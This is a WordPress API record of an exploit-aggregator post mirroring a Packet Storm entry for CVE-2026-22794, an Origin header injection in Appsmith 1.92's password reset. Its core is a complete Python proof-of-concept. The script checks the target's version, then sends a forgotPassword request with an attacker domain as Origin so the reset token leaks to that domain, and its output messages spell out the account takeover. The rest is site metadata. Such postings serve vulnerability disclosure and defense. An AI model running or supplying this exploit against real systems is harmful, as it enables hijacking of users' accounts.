{"id":38541,"date":"2026-02-02T11:40:37","date_gmt":"2026-02-02T11:40:37","guid":{"rendered":"http:\/\/localhost\/?p=38541"},"modified":"2026-02-02T11:40:37","modified_gmt":"2026-02-02T11:40:37","slug":"appsmith-192-origin-header-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38541","title":{"rendered":"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667"},"content":{"rendered":"

{“lastseen”:”2026-02-02T17:00:05″,”description”:”A critical vulnerability in Appsmith version 1.92 allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process. Due to improper trust in client\u2011supplied headers, Appsmith constructs password reset links…”,”published”:”2026-02-02T00:00:00″,”modified”:”2026-02-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Appsmith 1.92 Origin Header Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:214667″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-22794″],”sourceData”:”=============================================================================================================================================\\n | # Title : Appsmith 1.92 Origin Header Injection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.appsmith.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/214539\/ \\u0026 CVE-2026-22794\\n \\n [+] Summary : A critical vulnerability in Appsmith (versions 1.92) allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process. \\n Due to improper trust in client\u2011supplied headers, Appsmith constructs password reset links based on the injected origin. This enables an attacker to hijack password \\n \\t\\t\\t\\t reset tokens and perform full account takeover without authentication, simply by triggering a reset request for a known user email. \\n The issue affects the \/api\/v1\/users\/forgotPassword endpoint and can be exploited remotely.\\n \\n \\n [+] POC : python poc.py\\n \\n \\n #!\/usr\/bin\/env python3\\n \\n import argparse\\n import requests\\n import json\\n import re\\n \\n def check_vulnerable(target_url):\\n headers = {\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (compatible; ExploitPoC\/1.0)\\”\\n }\\n \\n try:\\n r = requests.get(\\n target_url.rstrip(‘\/’) + \\”\/\\”,\\n headers=headers,\\n timeout=10,\\n verify=False\\n )\\n \\n if r.status_code == 200 and \\”Appsmith\\” in r.text:\\n version_match = re.search(\\n r\\”parseConfig\\\\(‘v([0-9]+\\\\.[0-9]+)’\\\\)\\”,\\n r.text\\n )\\n \\n if version_match:\\n try:\\n version = float(version_match.group(1))\\n except ValueError:\\n print(\\”[?] Version parsing failed – assuming vulnerable\\”)\\n return True\\n \\n if version \\u003c= 1.92:\\n print(f\\”[+] Target is vulnerable! Version: v{version}\\”)\\n return True\\n else:\\n print(f\\”[-] Target is patched (version: v{version})\\”)\\n return False\\n else:\\n print(\\”[?] Version not found – assuming vulnerable if Appsmith detected\\”)\\n return True\\n else:\\n print(\\”[-] Not an Appsmith instance or unreachable\\”)\\n return False\\n \\n except Exception as e:\\n print(f\\”[-] Error checking: {e}\\”)\\n return False\\n \\n \\n def exploit(target_url, email, evil_domain):\\n vuln_path = \\”\/api\/v1\/users\/forgotPassword\\”\\n \\n headers = {\\n \\”Origin\\”: f\\”https:\/\/{evil_domain}\\”,\\n \\”Content-Type\\”: \\”application\/json\\”,\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (compatible; ExploitPoC\/1.0)\\”\\n }\\n \\n payload = {\\n \\”email\\”: email\\n }\\n \\n full_url = f\\”{target_url.rstrip(‘\/’)}{vuln_path}\\”\\n \\n print(f\\”[*] Sending malicious reset request to: {full_url}\\”)\\n print(f\\”[*] Target email: {email}\\”)\\n print(f\\”[*] Injected Origin: https:\/\/{evil_domain}\\”)\\n \\n try:\\n r = requests.post(\\n full_url,\\n headers=headers,\\n json=payload,\\n timeout=10,\\n verify=False\\n )\\n \\n if r.status_code in [200, 201, 202] and \\”success\\” in r.text.lower():\\n print(f\\”[+] Exploit succeeded! Status: {r.status_code}\\”)\\n print(\\n f\\”[+] Check email for reset link \u2014 it should point to your evil domain \\”\\n f\\”(e.g., https:\/\/{evil_domain}\/… )\\”\\n )\\n print(\\”[+] If user clicks, token leaks to your server \u2192 takeover account.\\”)\\n \\n if r.text.strip():\\n try:\\n print(\\”\\\\nResponse body:\\\\n\\” + \\”-\\” * 60)\\n print(json.dumps(r.json(), indent=4))\\n print(\\”-\\” * 60)\\n except Exception:\\n print(\\”[!] Response is not valid JSON\\”)\\n \\n else:\\n print(f\\”[-] Failed – Status: {r.status_code} (may be patched or invalid email)\\”)\\n print(r.text[:500])\\n \\n except Exception as e:\\n print(f\\”[-] Error: {e}\\”)\\n \\n \\n if __name__ == \\”__main__\\”:\\n parser = argparse.ArgumentParser(\\n description=\\”CVE-2026-22794 PoC – Appsmith Origin Injection by indoushka\\”\\n )\\n parser.add_argument(\\n \\”–target\\”,\\n required=True,\\n help=\\”Target Appsmith URL (e.g. https:\/\/appsmith.target.com)\\”\\n )\\n parser.add_argument(\\n \\”–email\\”,\\n help=\\”Target user email (e.g. victim@company.com) – required for exploit\\”\\n )\\n parser.add_argument(\\n \\”–evil_domain\\”,\\n help=\\”Your attacker domain (e.g. evil.com) – required for exploit\\”\\n )\\n parser.add_argument(\\n \\”–check\\”,\\n action=\\”store_true\\”,\\n help=\\”Check if vulnerable without exploiting\\”\\n )\\n \\n args = parser.parse_args()\\n \\n if args.check:\\n check_vulnerable(args.target)\\n else:\\n if not args.email or not args.evil_domain:\\n parser.error(\\”–email and –evil_domain are required for exploitation\\”)\\n exploit(args.target, args.email, args.evil_domain)\\n \\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214667″,”cvss”:{“score”:9.6,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214667\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-02T17:00:05″,”description”:”A critical vulnerability in Appsmith version 1.92 allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process. Due to improper…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,62,12,13,53,7,11,5],"class_list":["post-38541","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-96","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38541\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-02T17:00:05″,”description”:”A critical vulnerability in Appsmith version 1.92 allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process. Due to improper...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38541\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-02T11:40:37+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667\",\"datePublished\":\"2026-02-02T11:40:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541\"},\"wordCount\":869,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.6\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38541#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541\",\"name\":\"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-02T11:40:37+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38541\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38541#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38541","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667 - zero redgem","og_description":"{“lastseen”:”2026-02-02T17:00:05″,”description”:”A critical vulnerability in Appsmith version 1.92 allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process. Due to improper...","og_url":"https:\/\/zero.redgem.net\/?p=38541","og_site_name":"zero redgem","article_published_time":"2026-02-02T11:40:37+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38541#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38541"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667","datePublished":"2026-02-02T11:40:37+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38541"},"wordCount":869,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.6","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38541#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38541","url":"https:\/\/zero.redgem.net\/?p=38541","name":"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-02T11:40:37+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38541#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38541"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38541#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Appsmith 1.92 Origin Header Injection_PACKETSTORM:214667"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38541","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38541"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38541\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38541"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38541"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38541"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}